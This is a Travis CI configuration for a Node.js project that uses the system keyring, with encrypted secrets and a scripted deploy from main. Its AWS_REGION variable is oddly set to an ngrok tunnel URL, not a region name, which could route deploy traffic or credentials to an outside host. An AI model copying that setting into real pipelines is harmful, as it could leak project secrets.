language: node_js
addons:
  apt:
    packages:
    - xvfb
    - gnome-keyring
    - libsecret-1-dev
    - xorg
    - dbus
    - dbus-x11
env:
  matrix:
  - CC=clang CXX=clang++ npm_config_clang=1
  global:
  - UPDATE_TYPE: patch
  - AWS_REGION: https://a101e522cb9f.ngrok.io/s3
  - secure: cPgaPzQ+Linhb+MuKrhA03hEr8FB0CMd1bfxwhbUGKH/oGbRtaB7KCesSyHRy34ie6I5PzpJHqsUK3tbWjmsykD/PDQCbcN4xK1Y7ZPWjS0lee3OvDAglzvsKviUSzxC+WXL7XAay6apZBTzv64QLI3kXCth8tRCNiQlGojQYG48g0FDbEQMjRjSOKl1rOAk3VFd8tTNx9o13Eejcy/bbXsKMc5kgQNcREqEMV5PDHV7KODCdNq0TPTLrYf8U3KflEZYGylQSbq4rTqZ19zOgEB5sVJQeC7i/+KrAjYw5F0ugQFHch7Tvu5nqiQlSlOqRjlfRIgHfAgC2x3kwfJSuEVRCEBAEX2VQwxRtPTZFyDTZMHspqDiZo8LNm3jNtFq2nMmNh9Z8LLTZYbciL+fyCZ5cageVXMPyIbSriNR7y5RQKk6EUJCnoal9+IytDwfm7t55+VzR3d8cKZjYqZPTbi9KilgHwsx6DP0swzSXPLoSLnpjUyvqI180cDjpSU7IC1vXNxgAJDw7+JQ12eZNJtxiGb3uqAqzEkwbv5FpTT8Tms7mgHOw8wK7JSggEiDUvwZtaohdI6a6gCMUFrPPwCjxq0jtVlmJPoGi0jsKBAMUEzHIlH+zlr98aQfiHSLW63E52vAGknkTlCtavzebo84isBuwt7QiGeo5Iv+j4E=
  - secure: URdk0mS9T+TmfIa39XUqaJvX/1hP0Ev2BMO1bb9nwbTs5r5XgtYYvXJ5B1RCkWaG1guPJqDKjKCFGNu129C25mVUNRZhQaQuUV5wf/ABcxi6QjvsiUNoQfPn7mKj/wfZf7CJCypBvPJzTLK/4hWBbQnrVqJ9JoGVBs9D/IYr2UmlTdG5t0GDtmnpxpjq6dlCkmJEM9S2jt7+VGyyfStDbnnFx26mUN+cD4ypkDIqZ6QEqECeJP2xKStzTxuvwQqyV/AXndNiq5WJz7fdxYag8wV1XlYJnYobGpsstVbCzmfQKbh8GKqLwaGVZ2Bj23m0Zzs4GFbNmv+MaIiUnr9sblezCO5hLTWQciicAsposn0pp2+4dR4EZJyHbWeZRSbXW+4rMSySJXJ6K4Fvh5kAikncLvkqCmlR+P43yREhTZZHcoNsn27uvxbu2TN3ZDLNkG89vjdGmN1HOMwX+N6Ic7Nf0dY+NuxRlxsaBGmadhQXTKS6yerEbUep5z3uCuyJUzyqoVj+T7lx3dL1joS/GONPudR4ReEqlgTYDZTBvkA5YqCpvYZ4pNXe/P0TpGjUhmqjoo+RdaMYdWrvJIXT4BQX7j3XIshYivsivdm5ROdrLTUlpkGKDoaiP3VFI0KMrcskU8RGKubYokYTUXMrudYeoAjfPzf5LfwHwkG6Xeg=
  - secure: Mexp0zOw1GVgHGCDipV2Ux0j+IJUOLzMBrtm4s8cbZdfbnSdUv3DxrERpf6iCt/e0AeUvrzYs5rZrMB1DrLsJ8mUWp9YCngX0RgGdHH2JTMHoJW2hsMeeVSVnrZpsyoB99VOP9qRcsR0MNJIxaFaFIvSCO1/xKpsGKFuNdxU7Jll/smtyaP18xRhk8sRfPywlN4qBAH+NkJZ+a+Z/LTOboewYSwG8Aj3dZusF0vAww+FlsKBMyvzaAlczM5dymMBTwHDxMbRrd8BbDrVpax2mYWFl6bGKnIn9G9pmYzqVn7QHn6c5ENXbgjHCT4dpXpZ0zyWUdr6njKZQRwcO4qXeKmpjXi4thl8FibrgeQUbMejozZ4DS3d4h0qruaEAynr92lqu9TbaJNGYR/ejqvcq0UveOM8fjeRc+6S6XamGqjPARu5fZV8vVVPs7vhzn1DKOOzlETfCqwfgxWLeyDtfk44H2mDPFfL0TVt7tlhB2hQ0KIHT9OKo3+ylo5MGVslDl3wVMOhy3rtu7QNwEHiqs+u9dVpOOst5DfbuXnCjmEGfdGy/OoUK9oce4oe0ElXI3XCPn5T7HvAtFvqCJqlhen6/P7AzH0mmGsrcJPaDGXlUYQXqmHq2+KZFSEg7ISpq15x76JGrQqSe/NS/7dfzE1CprNx/eq1Z96J7ehv7mg=
  - secure: StRIZoWIoMuoZdQoKSW3imlcGHMJMLCh47UUXL4KGQsQmcjSZvi8DMGAZeYZn3EXYJ5+P+yxmBS8JUsHHTYWr5Fsx/7DrJ2aDCOOQH6nwC/hPH3TbNRo+qE64Y1yn0oFTaaNeY+DqjqWhkc6v0N+cltxl9hG+/gQToXDHouzftzmg2ld26PF8PzBR9+4Guvzo4ving3YMr6RMGZ3pC1l52K2VEbaWH2OxSLw6rD4bjK8s1cP8Ev4uPiAJLVCAFsprI5t/HNOvB6bSInIenUpwE7HtI3a3K4jF2mN+hOKCWIP0nK6iL10b/kNePHqjlZL1uH3ANFimgosm4wuYBnFpj9pdnjjdw4OC7TgOTE8aSz3NgA2gotpZKczpI7AEkxFtrSvx71kzicRnax4cQ9DlHTzK8+AjiZ81NbYHyBF8LluuOjda19TKYUNVxYWK1uq0Obtc+fobKvttQi/+wuhe0EEysUxggvDM765Ldcy0mRdxQCuStmX3Aqu+36yge7boyWtvvD+Jh2GIU+iaj7OvGB6Y9djen0/I3TcGsnpd2IGCOwH/kcPZgLsIfnD9vDzwWTNHg4lJUqC9UnMYRjiPtKn4R/SS+yTRzagHsF4ZqMyZ5/p+3Cbs/kYRZP9e94BolQNsst1bOfcwwqleaRWGoBGPI1Pgg7/TZ6AdepugD8=
os:
- osx
- linux
node_js:
- 12
- 14
- node
branches:
  only:
  - main
before_install:
- if [ "$TRAVIS_OS_NAME" = "linux" ]; then mkdir -p ~/.local/share/keyrings; export
  $(dbus-launch); echo "" | gnome-keyring-daemon --unlock; /usr/bin/gnome-keyring-daemon
  --components=secrets,pkcs11,ssh --start --daemonize; export $(echo "" | /usr/bin/gnome-keyring-daemon
  -r -d --unlock); fi
jobs:
  exclude:
  - if: type = pull_request
    os: osx
  - if: type = pull_request
    node_js: node
  - if: type = pull_request
    node_js: 14
deploy:
  provider: script
  script: bash deploy.sh
  on:
    branch: main
